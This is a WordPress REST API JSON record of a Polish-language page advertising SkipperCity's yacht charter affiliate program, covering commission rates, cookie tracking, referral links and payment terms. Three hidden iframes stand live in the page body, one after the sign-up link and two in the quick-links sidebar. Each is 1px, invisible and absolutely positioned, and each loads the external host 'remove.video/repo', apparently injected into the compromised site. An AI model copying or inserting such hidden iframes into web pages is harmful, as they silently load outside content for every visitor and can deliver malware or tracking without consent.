{"id":412123,"date":"2024-01-15T12:32:29","date_gmt":"2024-01-15T12:32:29","guid":{"rendered":"https:\/\/www.skippercity.com\/program-partnerski-czarteru-jachtow\/"},"modified":"2024-02-21T11:19:50","modified_gmt":"2024-02-21T11:19:50","slug":"program-partnerski-czarteru-jachtow","status":"publish","type":"page","link":"https:\/\/skippercity.com\/pl\/program-partnerski-czarteru-jachtow\/","title":{"rendered":"Program partnerski czarteru jacht\u00f3w"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"412123\" class=\"elementor elementor-412123 elementor-412040\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1250e588 elementor-section-full_width elementor-section-height-min-height elementor-section-items-stretch elementor-section-content-middle elementor-section-height-default\" data-id=\"1250e588\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9f1c76f\" data-id=\"9f1c76f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a4f0833 elementor-widget elementor-widget-heading\" data-id=\"4a4f0833\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Program partnerski czarteru jacht\u00f3w<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4eaa1748 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4eaa1748\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-25087f4b\" data-id=\"25087f4b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-571c4982\" data-id=\"571c4982\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-66f25697\" data-id=\"66f25697\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4518a569 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4518a569\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-4a55adf6\" data-id=\"4a55adf6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-225b732b elementor-widget elementor-widget-text-editor\" data-id=\"225b732b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\"><strong>Szybkie fakty:<\/strong><\/span><\/p>\n<ul>\n<li>Najlepiej p\u0142atny program partnerski<\/li>\n<li>20-25% z naszej prowizji od wynajmu \u0142odzi<\/li>\n<li>Do\u017cywotnie prowizje<\/li>\n<li>365 dni wyga\u015bni\u0119cia plik\u00f3w cookie<\/li>\n<\/ul>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-16c35e15 elementor-widget elementor-widget-table-of-contents\" data-id=\"16c35e15\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;exclude_headings_by_selector&quot;:[],&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;,&quot;h5&quot;,&quot;h6&quot;],&quot;marker_view&quot;:&quot;numbers&quot;,&quot;no_headings_message&quot;:&quot;No headings were found on this page.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__header\">\n\t\t\t\t\t\t<h4 class=\"elementor-toc__header-title\">\n\t\t\t\tSpis tre\u015bci\t\t\t<\/h4>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div id=\"elementor-toc__16c35e15\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<svg class=\"elementor-toc__spinner eicon-animation-spin e-font-icon-svg e-eicon-loading\" aria-hidden=\"true\" viewBox=\"0 0 1000 1000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M500 975V858C696 858 858 696 858 500S696 142 500 142 142 304 142 500H25C25 237 238 25 500 25S975 237 975 500 763 975 500 975Z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-70ed3a7f\" data-id=\"70ed3a7f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4c5b7b5f elementor-widget elementor-widget-text-editor\" data-id=\"4c5b7b5f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Program partnerski czarteru jacht\u00f3w<\/h2>\n<p>Je\u015bli masz stron\u0119 internetow\u0105 z klientami, kt\u00f3rzy mog\u0105 by\u0107 zainteresowani czarterem jacht\u00f3w &#8211; \u017cagl\u00f3wek, gulet\u00f3w, jacht\u00f3w motorowych, super jacht\u00f3w &#8211; w dowolnym miejscu na \u015bwiecie, byliby\u015bmy zainteresowani wsp\u00f3\u0142prac\u0105 partnersk\u0105.<\/p>\n<p><u><b>Kochamy Partner\u00f3w!<\/b><\/u><\/p>\n<p>Program partnerski Yachtco umo\u017cliwia zarabianie na czarterach jacht\u00f3w poprzez dodanie linku do naszej strony.<\/p>\n<h2>Jak to dzia\u0142a?<\/h2>\n<p>Gdy klient <strong>kliknie na link na stronie internetowej<\/strong> (lub blogu lub mediach spo\u0142eczno\u015bciowych), trafi na nasz\u0105 stron\u0119, a nast\u0119pnie wyczarteruje \u0142\u00f3d\u017a za naszym po\u015brednictwem, procent prowizji zostanie przekazany u\u017cytkownikowi zgodnie z naszymi warunkami. Wszystko jest monitorowane (elektronicznie i offline), a my monitorujemy status potencjalnych klient\u00f3w.<\/p>\n<p><strong>Broker (czyli my) pobiera op\u0142at\u0119<\/strong> od warto\u015bci czarteru netto rezerwacji \u0142odzi (bez uwzgl\u0119dnienia APA lub jakichkolwiek dodatkowych zam\u00f3wionych element\u00f3w lub us\u0142ug). Prowizja ta zale\u017cy od lokalizacji, typu \u0142odzi i prowizji w bran\u017cy. <strong>Partner (czyli Ty) zyska 20%-25%<\/strong> jako stawk\u0119 podstawow\u0105 dla tej op\u0142aty uzyskanej od brokera.<\/p>\n<p><b>Skippercity jest dumne z tego, \u017ce wiernie pod\u0105\u017ca za wszystkimi klientami czarterowymi, dlatego partnerzy s\u0105 wynagradzani poprzez zarabianie 20%-25% naszej prowizji od wszystkich rezerwacji klient\u00f3w powracaj\u0105cych do nas.<\/b><\/p>\n<p>Nasz system \u015bledzi klient\u00f3w, kt\u00f3rzy wcze\u015bniej z\u0142o\u017cyli zapytanie u partnera lub dokonali rezerwacji u partnera, dzi\u0119ki czemu zawsze mo\u017cemy zwr\u00f3ci\u0107 prowizj\u0119 partnerowi. Skippercity uszanuje wprowadzenie i zaoferuje partnerom op\u0142at\u0119 za wprowadzenie, je\u015bli klient powr\u00f3ci do Skippercity poza programem partnerskim (tj. bez plik\u00f3w cookie), aby uhonorowa\u0107 link, kt\u00f3ry nam poda\u0142, poniewa\u017c wcze\u015bniej przyszed\u0142 do nas, pytaj\u0105c za po\u015brednictwem partnera.<\/p>\n<p>3 000 EUR to \u015brednia warto\u015b\u0107 czarteru netto umo\u017cliwiaj\u0105ca otrzymanie prowizji. Obowi\u0105zuj\u0105 nasze warunki i postanowienia.<\/p>\n<p>Mamy dla Ciebie sposoby zapyta\u0144, stylowe zdj\u0119cia i przyciski. S\u0105 one dost\u0119pne z poziomu &#8222;dashboardu&#8221; partnera, wi\u0119c wystarczy skopiowa\u0107 i wklei\u0107 kod na swoj\u0105 stron\u0119 internetow\u0105 i gotowe!<\/p>\n<p>Tw\u00f3j adres URL dla partner\u00f3w to https:\/\/skippercity.com\/?ref=username. Wystarczy zainstalowa\u0107 kod (?ref=?ref=username) na ko\u0144cu dowolnego linku do Skippercity, a wszystko b\u0119dzie monitorowane od tego momentu!<\/p>\n<p>Je\u015bli jeste\u015b zainteresowany przyst\u0105pieniem <a href=\"https:\/\/skippercity.com\/pl\/zostan-naszym-partnerem\/\">do naszego programu partnerskiego, kliknij tutaj, aby<\/a> si\u0119 zarejestrowa\u0107, a my rozpatrzymy Tw\u00f3j wniosek o przyst\u0105pienie do programu.<\/p>\n<p>Ca\u0142a zawarto\u015b\u0107 strony SkipperCity jest chroniona prawem autorskim. Nie zach\u0119camy naszych podmiot\u00f3w stowarzyszonych do korzystania z jakichkolwiek tre\u015bci na stronie https:\/\/skippercity.com oraz do kopiowania lub powielania materia\u0142\u00f3w na w\u0142asnej stronie internetowej jako w\u0142asnych w jakikolwiek spos\u00f3b. Zach\u0119camy jednak do tworzenia w\u0142asnych tre\u015bci i linkowania do nas.<\/p>\n<h2>Jak \u015bledzimy sprzeda\u017c<\/h2>\n<p>Wszyscy klienci przychodz\u0105cy z Twojej witryny b\u0119d\u0105 &#8222;cookied&#8221;, a Twoje konto b\u0119dzie po\u0142\u0105czone z plikami cookie. Gdy klient wysy\u0142a do nas zapytanie lub tworzy u nas konto, robimy to, co potrafimy najlepiej &#8211; rekomendujemy odpowiedni\u0105 \u0142\u00f3d\u017a, zawieramy umow\u0119 i dokonujemy p\u0142atno\u015bci, a nast\u0119pnie organizujemy wej\u015bcie klienta na pok\u0142ad.<\/p>\n<p>Je\u015bli klient, kt\u00f3ry czarteruje jacht, pochodzi z Twojej strony internetowej, podzielimy si\u0119 z Tob\u0105 cz\u0119\u015bci\u0105 prowizji.<\/p>\n<h2>Jak otrzymujesz wynagrodzenie?<\/h2>\n<p>P\u0142acimy naszym partnerom przelewem bankowym lub za po\u015brednictwem Stripe.<\/p>\n<p>Partnerzy otrzymaj\u0105 wynagrodzenie miesi\u0105c po pomy\u015blnym zako\u0144czeniu czarteru &#8211; jest to norma bran\u017cowa dla wszystkich zainteresowanych stron. Wszyscy uczestnicy otrzymuj\u0105 wynagrodzenie po pomy\u015blnym zako\u0144czeniu czarteru, poniewa\u017c w przypadku wyst\u0105pienia jakichkolwiek problem\u00f3w podczas czarteru, chcemy mie\u0107 pewno\u015b\u0107, \u017ce brokerzy, mened\u017cerowie jacht\u00f3w, skipperzy i w\u0142a\u015bciciele rozwi\u0105\u017c\u0105 je, zanim klienci zejd\u0105 z jachtu.<\/p>\n<p>W przypadku wszystkich anulowanych czarter\u00f3w (przez klient\u00f3w lub w\u0142a\u015bcicieli), podmioty stowarzyszone, biura podr\u00f3\u017cy i wszystkie osoby polecone nie otrzymuj\u0105 \u017cadnej prowizji.<\/p>\n<h2>Jak zarejestrowa\u0107 si\u0119 w programie partnerskim<\/h2>\n<p>Aby ubiega\u0107 si\u0119 o udzia\u0142 w programie partnerskim, musisz mie\u0107 istniej\u0105c\u0105 stron\u0119 internetow\u0105, blog lub sie\u0107 spo\u0142eczno\u015bciow\u0105 z baz\u0105 klient\u00f3w, kt\u00f3ra uzupe\u0142nia czarter jacht\u00f3w (podr\u00f3\u017ce, produkty luksusowe, us\u0142ugi concierge itp.).<\/p>\n<p>Nie ponosisz \u017cadnego ryzyka ani koszt\u00f3w zwi\u0105zanych z programem partnerskim. Wystarczy wype\u0142ni\u0107 <a href=\"https:\/\/skippercity.com\/pl\/zostan-naszym-partnerem\/\">nasz formularz online<\/a>.<iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74185aa8 elementor-align-justify elementor-widget elementor-widget-button\" data-id=\"74185aa8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/skippercity.com\/pl\/zostan-naszym-partnerem\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Zarejestruj si\u0119 w naszym programie partnerskim czarteru jacht\u00f3w<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-1b9e4a7d\" data-id=\"1b9e4a7d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c060e83 elementor-widget elementor-widget-text-editor\" data-id=\"7c060e83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\">Szybkie \u0142\u0105cza:<\/span><\/p>\n<ul>\n<li><a href=\"https:\/\/skippercity.com\/pl\/zostan-naszym-partnerem\/\">Rejestracja\/Zarejestruj si\u0119<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/pl\/logowanie-partnera\/\">Logowanie<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/pl\/moje-konto-2\/\">Twoje konto partnerskie<\/a><\/li>\n<\/ul>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Program partnerski czarteru jacht\u00f3w Szybkie fakty: Najlepiej p\u0142atny program partnerski 20-25% z naszej prowizji od wynajmu \u0142odzi Do\u017cywotnie prowizje 365 dni wyga\u015bni\u0119cia plik\u00f3w cookie Spis tre\u015bci Program partnerski czarteru jacht\u00f3w Je\u015bli masz stron\u0119 internetow\u0105 z klientami, kt\u00f3rzy mog\u0105 by\u0107 zainteresowani czarterem jacht\u00f3w &#8211; \u017cagl\u00f3wek, gulet\u00f3w, jacht\u00f3w motorowych, super jacht\u00f3w &#8211; w dowolnym miejscu na \u015bwiecie, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":408270,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-412123","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/pages\/412123","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/comments?post=412123"}],"version-history":[{"count":0,"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/pages\/412123\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/media\/408270"}],"wp:attachment":[{"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/media?parent=412123"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}